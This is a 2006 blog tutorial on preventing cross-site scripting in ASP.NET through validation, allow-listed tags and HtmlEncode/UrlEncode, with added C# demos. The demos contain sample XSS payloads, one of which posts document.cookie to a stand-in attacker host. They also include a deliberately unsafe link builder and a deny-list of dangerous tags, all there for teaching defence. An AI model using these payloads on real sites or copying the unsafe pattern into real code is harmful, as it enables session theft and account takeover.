One of the many purposes of this blog is to stay up to date with .NET security features.  The security topic I'm going to cover today is Cross-Site Scripting (XSS).  First off, let's understand what an XSS attack is.
XSS attacks exploit weak input validation in web applications by injecting client-side script, such as JavaScript (JS) or VBScript (VBS), into a page the application renders.  The injected script may be reflected straight back in the response to the request that carried it, or stored on the server (in a database, for example) and sent to every user who later views that page.  Either way it runs in the victim's browser with the privileges of the vulnerable site's origin.  These attacks are even more dangerous on sites placed in Internet Explorer's Trusted Sites zone, where most scripting is allowed.
A typical example of an XSS attack is script that reads the user's authentication session cookie and posts it to a site the attacker controls; the attacker then replays that cookie against the vulnerable site to gain access to the user's account and personal information.
To prevent these attacks, we need to apply one of the major tenets of security: never trust user input.  XSS arises because user input isn't properly validated and because it is written back into pages without being encoded; encoding turns any script it contains into harmless text.  Let's discuss each point: how to validate the data, HTML encoding and URL encoding.
To validate data, use the built-in validators such as the RegularExpressionValidator.  A regular expression can reject input that contains HTML tags outright.  It gets more difficult when you want to allow only certain HTML tags and disallow the rest.
Let's see how we can use the RegularExpressionValidator to validate an employee ID which must be exactly 8 digits.  Remember that the client-side half of a validator can be bypassed by anyone who edits the request, so the server-side code must check Page.IsValid before using the value.
<asp:TextBox id="txtEmployeeID" runat="server"></asp:TextBox>
<asp:RegularExpressionValidator
   id="txtEmployeeID_validation" runat="server"
   ControlToValidate="txtEmployeeID"
   ValidationExpression="^\d{8}$"
   ErrorMessage="Enter a valid employee ID." />
We can also use the StringBuilder class to allow certain tags: HTML-encode the whole input first, then turn a small allow-list of harmless tags back into real markup.  An example of this can be the following:
StringBuilder userInput = new StringBuilder(HttpUtility.HtmlEncode(Request.Form["executiveSummary"]));
userInput.Replace("&lt;b&gt;", "<b>");
userInput.Replace("&lt;/b&gt;", "</b>");
Only restore tags that carry no attributes, as here; a tag such as <a> or <img> with an attribute gives the attacker somewhere to put an event handler or a javascript: URL.
The potentially dangerous HTML tags that we may want to remove with a regular expression or the StringBuilder.Replace method include the following.  Keep in mind that no deny-list like this is ever complete (new tags, attributes and browser quirks appear all the time), so it is safer to allow a few known-good tags than to try to block every bad one:
* <applet>
* <body>
* <embed>
* <frame>
* <script>
* <frameset>
* <html>
* <iframe>
* <img>
* <style>
* <layer>
* <link>
* <ilayer>
* <meta>
* <object>
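The encode-then-restore approach from the StringBuilder snippet above, carried through as a complete helper, is shown here as an added example (not code from the original post).  The helper name AllowSafeTags, the allow-list contents and the sample inputs are assumptions made for this illustration.  It shows why the allow-list fails safe: a tag that carries an attribute, such as <b onmouseover=...>, never matches the bare "&lt;b&gt;" pattern and so stays encoded, while <script> and <img> are never restored at all.

```csharp
// Added example (not from the original post): encode everything, then restore
// a small allow-list of attribute-free tags. The helper name AllowSafeTags,
// the allow-list and the sample inputs are assumptions for this illustration.
using System;
using System.Text;
using System.Web; // HttpUtility; on .NET Framework add a reference to System.Web.dll

public static class SafeHtml
{
    // Tags the application is willing to render. Only the bare opening and
    // closing forms are ever restored, so there is nowhere to hide onerror=,
    // onmouseover= or a javascript: URL.
    private static readonly string[] AllowedTags = { "b", "i", "em", "strong" };

    public static string AllowSafeTags(string input)
    {
        if (input == null) return string.Empty;

        // Step 1: neutralise the whole string. After this no '<' or '>' survives,
        // so <script>, <img onerror=...> and the rest render as literal text.
        StringBuilder sb = new StringBuilder(HttpUtility.HtmlEncode(input));

        // Step 2: put back exactly the opening and closing forms of allowed tags.
        // Anything that does not match byte-for-byte (an attribute, a space,
        // upper case) simply stays encoded, which is the safe outcome.
        foreach (string tag in AllowedTags)
        {
            sb.Replace("&lt;" + tag + "&gt;", "<" + tag + ">");
            sb.Replace("&lt;/" + tag + "&gt;", "</" + tag + ">");
        }
        return sb.ToString();
    }

    public static void Main()
    {
        // Constructed sample inputs for the demo: one legitimate summary, then
        // the kinds of payloads the tag list above is worried about.
        string[] samples =
        {
            "Q3 revenue was <b>up 12%</b> against <i>flat</i> costs",
            "<script>document.location='http://evil.example/?c='+document.cookie</script>",
            "<img src=x onerror=alert(1)>",
            "<b onmouseover=alert(1)>hover me</b>",
            "<B>upper-case tag</B> is not on the allow-list as written",
            "Tom & Jerry"
        };
        foreach (string s in samples)
        {
            Console.WriteLine("IN : " + s);
            Console.WriteLine("OUT: " + AllowSafeTags(s));
            Console.WriteLine();
        }
    }
}
```

Run it as a console program and compare each IN/OUT pair: the <b> and <i> in the first line come back as markup, every other tag is printed as text, and the bare ampersand becomes &amp; so it cannot start an entity.  The mismatches (attribute present, upper-case tag) are deliberate in that they err on the side of showing literal text rather than rendering something the allow-list did not anticipate.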
Type conversions can also be used on typed data, such as converting the input to an integer employee ID.  If the data cannot be parsed as the specified type, an exception is thrown, which you should catch and treat as invalid input rather than let propagate.
An example of this would be (this needs using System.Globalization; for CultureInfo and DateTimeStyles):
try
{
    DateTime userDate = DateTime.Parse(Request.Form["userDate"], CultureInfo.CurrentCulture, DateTimeStyles.AllowWhiteSpaces);
    // userDate is now a real DateTime, not attacker-controlled text
}
catch (FormatException)
{
    Response.Write("Invalid date");
}
catch (ArgumentNullException)
{
    // the field was missing from the form entirely
    Response.Write("Invalid date");
}
HTML encoding turns the characters that have meaning in HTML (<, >, & and ") into their entity equivalents, so the browser displays them instead of interpreting them.  For example, HTML encoding would take <HTML> and turn it into &lt;HTML&gt;.  The HttpUtility.HtmlEncode method allows the implementer to do this with ease.
An example of this would be:
Response.Write("User ID is " + HttpUtility.HtmlEncode(Request.Form["userId"]));
If you are writing user input back into a URL, for example as a query-string parameter in a link, it must be encoded for that context as well; HtmlEncode is not enough, because characters such as & and = have their own meaning inside a URL.  To encode a URL parameter, use the HttpUtility.UrlEncode method.  A value often needs both layers: UrlEncode when the URL is built, then HtmlEncode (or HttpUtility.HtmlAttributeEncode) when that URL is placed inside an HTML attribute such as href, because the HTML parser and the URL parser each read the output separately.
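The following is an added example, not code from the original post, showing one attacker-controlled value encoded for three different output contexts (HTML text, a URL parameter inside an href attribute, and the unencoded link for comparison).  The function names, the page name search.aspx and the payload string are assumptions made for this illustration.

```csharp
// Added example (not from the original post): the same attacker-controlled
// value encoded for three output contexts. The function names, the page
// search.aspx and the payload are assumptions made for this illustration.
using System;
using System.Web; // HttpUtility; on .NET Framework add a reference to System.Web.dll

public static class OutputEncoding
{
    // 1. Text between tags: HtmlEncode is the right tool. '<', '>', '&' and '"'
    //    become entities, so the browser shows them rather than parsing them.
    public static string RenderGreeting(string userName)
    {
        return "<p>Hello, " + HttpUtility.HtmlEncode(userName) + "</p>";
    }

    // 2. A query-string parameter: UrlEncode escapes the characters that mean
    //    something in a URL (&, =, ?, #, space, <, >, " ...). The finished URL
    //    then goes inside an href attribute, so it is attribute-encoded as
    //    well; each layer protects against a different parser, and the browser
    //    unwraps them in the reverse order (HTML first, then URL).
    public static string RenderSearchLink(string query)
    {
        string url = "search.aspx?q=" + HttpUtility.UrlEncode(query);
        return "<a href=\"" + HttpUtility.HtmlAttributeEncode(url) + "\">Search again</a>";
    }

    // 3. What goes wrong when the URL context is skipped: the raw value can
    //    close the attribute with a quote and open a <script> tag, and the
    //    bare '&' lets it add or override query parameters. Shown only for
    //    comparison; never ship this.
    public static string RenderSearchLinkUnsafe(string query)
    {
        return "<a href=\"search.aspx?q=" + query + "\">Search again</a>";
    }

    public static void Main()
    {
        // Constructed payload: tries to break out of the attribute, inject a
        // script tag, and smuggle an extra query parameter.
        string payload = "\"><script>alert(document.cookie)</script>&admin=1";

        Console.WriteLine("HTML text   : " + RenderGreeting(payload));
        Console.WriteLine("Encoded link: " + RenderSearchLink(payload));
        Console.WriteLine("Unsafe link : " + RenderSearchLinkUnsafe(payload));
    }
}
```

Paste the three lines of output into a test page and view the source: in the first two the payload is inert text and the link still carries a single q parameter, while in the third the attribute closes early and the <script> element is live.  The rule of thumb the example illustrates is to pick the encoder by where the data lands, not by where it came from.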
There are many other topics to cover and once again this is just an introduction.  Listed below are some resources to help with Cross Site Scripting issues.
MSDN How To's for Cross-Site Scripting:
MSDN Channel 9 lab on Cross-Site Scripting:
Microsoft Anti-Cross Site Scripting Library v1.0:
In future posts, I'll get more in detail with the Anti-Cross Site Scripting Library and what advantages it has.
Posted on Thursday, May 18, 2006 3:42 PM Microsoft , .NET , C# , ASP.NET | Back to top

Comments on this post: Understanding and Preventing Cross-Site Scripting
Copyright © Matthew Podwysocki